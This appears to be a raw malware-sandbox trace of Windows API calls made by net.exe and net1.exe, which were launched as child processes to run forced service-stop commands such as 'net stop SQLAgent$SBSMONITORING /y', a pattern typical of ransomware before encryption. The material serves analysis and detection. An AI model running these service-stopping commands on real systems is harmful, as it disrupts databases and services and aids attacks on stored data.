lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x234 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0211.607] LocalFree (hMem=0x465868) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x13 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x16) returned 14 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START MESSENGER\r\n", _MaxCount=0x16) returned 14 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START NET LOGON\r\n", _MaxCount=0x16) returned 14 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x16 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x11 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x12 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0xf [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x17 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x18 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x2a [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0211.608] LocalFree (hMem=0x463f78) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e㽸F\x0e") returned 0x58 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0211.608] LocalFree (hMem=0x469868) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0x184 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0211.608] LocalFree (hMem=0x469868) returned 0x0 [0211.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0xc7 [0211.608] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0211.608] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0x47 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0xc2 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0x319 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0x483 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0xa86 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0x54 [0211.609] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e顨F\x0e") returned 0xad [0211.609] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e顨F\x0e") returned 0x2e [0211.609] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0211.609] LocalFree (hMem=0x463f78) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e㽸F\x0e") returned 0x7d [0211.609] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0211.609] LocalFree (hMem=0x469868) returned 0x0 [0211.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e顨F\x0e") returned 0x26 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x1b [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e㽸F\x0e") returned 0xbe [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0211.610] LocalFree (hMem=0x469868) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e顨F\x0e") returned 0x33 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e㽸F\x0e") returned 0xc1 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0211.610] LocalFree (hMem=0x469868) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e顨F\x0e") returned 0x16 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x33 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="顨F⡋瓢\x0e㽸F\x0e") returned 0x234 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0211.610] LocalFree (hMem=0x469868) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e顨F\x0e") returned 0x13 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.610] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.610] LocalFree (hMem=0x463f78) returned 0x0 [0211.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x16 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㶐F⡋瓢\x0e㽸F\x0e") returned 0x11 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463d90) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㶐F\x0e") returned 0x14 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x12 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0xf [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x17 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x18 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x2a [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0211.611] LocalFree (hMem=0x463f78) returned 0x0 [0211.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.611] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0211.611] GetFileType (hFile=0x26c) returned 0x3 [0211.611] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0xef4a0 | out: lpMode=0xef4a0) returned 0 [0211.612] GetConsoleOutputCP () returned 0x1b5 [0211.612] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0211.612] malloc (_Size=0x16) returned 0x622738 [0211.612] GetConsoleOutputCP () returned 0x1b5 [0211.612] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x622738, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0211.612] WriteFile (in: hFile=0x26c, lpBuffer=0x622738, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0xef4a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef4a4, lpOverlapped=0x0) returned 0 [0211.612] free (_Block=0x622738) [0211.612] LocalFree (hMem=0x463f78) returned 0x0 [0211.613] NetApiBufferFree (Buffer=0x461ca8) returned 0x0 [0211.613] NetApiBufferFree (Buffer=0x461cc0) returned 0x0 [0211.613] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Enterprise Client ServiceΓÇ¥ /y" [0211.613] exit (_Code=1) Process: id = "298" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4ad000" os_pid = "0x63c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 471 os_tid = 0x1ec Process: id = "299" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5f00c000" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "298" os_parent_pid = "0x63c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 472 os_tid = 0xa64 [0211.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf7c8 | out: lpSystemTimeAsFileTime=0x2cf7c8*(dwLowDateTime=0x4766f100, dwHighDateTime=0x1d57a87)) [0211.750] GetCurrentProcessId () returned 0xa60 [0211.750] GetCurrentThreadId () returned 0xa64 [0211.750] GetTickCount () returned 0x116e83d [0211.750] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf7c0 | out: lpPerformanceCount=0x2cf7c0*=33203489793) returned 1 [0211.751] GetModuleHandleA (lpModuleName=0x0) returned 0x4e0000 [0211.751] __set_app_type (_Type=0x1) [0211.751] __p__fmode () returned 0x74eb31f4 [0211.751] __p__commode () returned 0x74eb31fc [0211.751] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4effe6) returned 0x0 [0211.751] __getmainargs (in: _Argc=0x4f9064, _Argv=0x4f906c, _Env=0x4f9068, _DoWildCard=0, _StartInfo=0x4f9024 | out: _Argc=0x4f9064, _Argv=0x4f906c, _Env=0x4f9068) returned 0 [0211.751] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.751] GetConsoleOutputCP () returned 0x1b5 [0211.751] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4f9080 | out: lpCPInfo=0x4f9080) returned 1 [0211.751] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.754] sprintf_s (in: _DstBuf=0x2cf780, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.754] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.756] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.757] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.757] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" [0211.757] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf54c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.757] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80) returned 0x2e4bf8 [0211.757] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.757] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cf750 | out: Buffer=0x2cf750*=0x2e1c90) returned 0x0 [0211.757] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cf750 | out: Buffer=0x2cf750*=0x2e1ca8) returned 0x0 [0211.757] _fileno (_File=0x74eb2900) returned -2 [0211.757] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.757] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.757] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.757] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.757] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.757] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.757] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.757] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.757] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.758] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.758] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.758] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.758] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.758] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.758] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.758] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.758] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.758] 